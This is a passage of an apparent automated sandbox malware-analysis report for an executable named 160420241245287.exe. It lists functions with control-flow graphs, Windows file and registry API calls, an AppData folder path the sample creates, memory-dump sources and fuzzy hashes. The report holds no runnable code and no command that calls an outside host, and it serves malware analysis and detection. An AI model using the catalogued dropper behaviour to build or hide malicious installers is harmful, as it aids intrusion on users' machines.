                                                                        control_flow_graph 733 40317d-4031a6 GetTickCount 734 4032e7-4032ef call 402d1a 733->734 735 4031ac-4031d7 call 40330f SetFilePointer 733->735 740 4032f1-4032f6 734->740 741 4031dc-4031ee 735->741 742 4031f0 741->742 743 4031f2-403200 call 4032f9 741->743 742->743 746 403206-403212 743->746 747 4032d9-4032dc 743->747 748 403218-40321e 746->748 747->740 749 403220-403226 748->749 750 403249-403265 call 406390 748->750 749->750 751 403228-403248 call 402d1a 749->751 756 4032e2 750->756 757 403267-40326f 750->757 751->750 758 4032e4-4032e5 756->758 759 403271-403287 WriteFile 757->759 760 4032a3-4032a9 757->760 758->740 762 403289-40328d 759->762 763 4032de-4032e0 759->763 760->756 761 4032ab-4032ad 760->761 761->756 764 4032af-4032c2 761->764 762->763 765 40328f-40329b 762->765 763->758 764->741 766 4032c8-4032d7 SetFilePointer 764->766 765->748 767 4032a1 765->767 766->734 767->764
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00403192
                                                                          • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                        • WriteFile.KERNELBASE(0040BE78,00410D5C,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                        • SetFilePointer.KERNELBASE(0008E5B9,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: File$Pointer$CountTickWrite
                                                                        • String ID: \A$x>A
                                                                        • API String ID: 2146148272-2511885664
                                                                        • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                        • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                        • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                        • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 768 4015b9-4015cd call 402b3a call 4059e0 773 401614-401617 768->773 774 4015cf-4015eb call 405962 CreateDirectoryW 768->774 776 401646-402197 call 401423 773->776 777 401619-401638 call 401423 call 405eea SetCurrentDirectoryW 773->777 781 40160a-401612 774->781 782 4015ed-4015f8 GetLastError 774->782 789 4029c7-4029d6 776->789 777->789 792 40163e-401641 777->792 781->773 781->774 785 401607 782->785 786 4015fa-401605 GetFileAttributesW 782->786 785->781 786->781 786->785 792->789
                                                                        APIs
                                                                          • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,?,?,74DF2EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\160420241245287.exe"), ref: 004059EE
                                                                          • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                          • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                        • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                        • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs,?,00000000,000000F0), ref: 00401630
                                                                        Strings
                                                                        • C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs, xrefs: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                        • String ID: C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs
                                                                        • API String ID: 3751793516-3154209270
                                                                        • Opcode ID: 05b28ac8e60e3321a7284e54e3749bb0ea51052cb39d8f8e340da353c49dd174
                                                                        • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                        • Opcode Fuzzy Hash: 05b28ac8e60e3321a7284e54e3749bb0ea51052cb39d8f8e340da353c49dd174
                                                                        • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 794 402b7a-402ba3 RegOpenKeyExW 795 402ba5-402bb0 794->795 796 402c0e-402c12 794->796 797 402bcb-402bdb RegEnumKeyW 795->797 798 402bb2-402bb5 797->798 799 402bdd-402bef RegCloseKey call 406254 797->799 800 402c02-402c05 RegCloseKey 798->800 801 402bb7-402bc9 call 402b7a 798->801 807 402bf1-402c00 799->807 808 402c15-402c1b 799->808 803 402c0b-402c0d 800->803 801->797 801->799 803->796 807->796 808->803 809 402c1d-402c2b RegDeleteKeyW 808->809 809->803 810 402c2d 809->810 810->796
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Close$DeleteEnumOpen
                                                                        • String ID:
                                                                        • API String ID: 1912718029-0
                                                                        • Opcode ID: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
                                                                        • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                        • Opcode Fuzzy Hash: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
                                                                        • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00403062 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 812 403062-403070 813 403072-403088 SetFilePointer 812->813 814 40308e-403097 call 40317d 812->814 813->814 817 403177-40317a 814->817 818 40309d-4030b0 call 405bd9 814->818 821 403163 818->821 822 4030b6-4030ca call 40317d 818->822 824 403165-403166 821->824 822->817 826 4030d0-4030d3 822->826 824->817 827 4030d5-4030d8 826->827 828 40313f-403145 826->828 831 403174 827->831 832 4030de 827->832 829 403147 828->829 830 40314a-403161 ReadFile 828->830 829->830 830->821 834 403168-403171 830->834 831->817 833 4030e3-4030ed 832->833 835 4030f4-403106 call 405bd9 833->835 836 4030ef 833->836 834->831 835->821 839 403108-40311d WriteFile 835->839 836->835 840 40313b-40313d 839->840 841 40311f-403122 839->841 840->824 841->840 842 403124-403137 841->842 842->833 843 403139 842->843 843->831
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                        • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: File$PointerWrite
                                                                        • String ID: x>A
                                                                        • API String ID: 539440098-3854404225
                                                                        • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                        • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                        • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                        • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405B85 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 844 405b85-405b91 845 405b92-405bc6 GetTickCount GetTempFileNameW 844->845 846 405bd5-405bd7 845->846 847 405bc8-405bca 845->847 849 405bcf-405bd2 846->849 847->845 848 405bcc 847->848 848->849
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00405BA3
                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                        • API String ID: 1716503409-678247507
                                                                        • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                        • Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
                                                                        • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                        • Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402331 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                        • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                        • RegSetValueExW.KERNELBASE(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                        • RegCloseKey.KERNELBASE(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateValuelstrlen
                                                                        • String ID:
                                                                        • API String ID: 1356686001-0
                                                                        • Opcode ID: 7ae6cfb98f067118f352b4b543c975525a9f2c1f86559555cde91f504c44b85d
                                                                        • Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
                                                                        • Opcode Fuzzy Hash: 7ae6cfb98f067118f352b4b543c975525a9f2c1f86559555cde91f504c44b85d
                                                                        • Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00403326 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\160420241245287.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 004061E1
                                                                          • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                          • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\160420241245287.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 004061F5
                                                                          • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 00406208
                                                                        • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 00403347
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 4115351271-517883005
                                                                        • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                        • Instruction ID: 15e16a0f1bb74d2da72680a3c6f5190242cf739030cfb371398593c950d8801c
                                                                        • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                        • Instruction Fuzzy Hash: 65D0C92250693171C55236663E06FCF166C8F4A32AF129077F805B90D6DB7C2A8245FE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406974 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                        • Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
                                                                        • Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                        • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406B75 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                        • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                        • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                        • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040688B Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
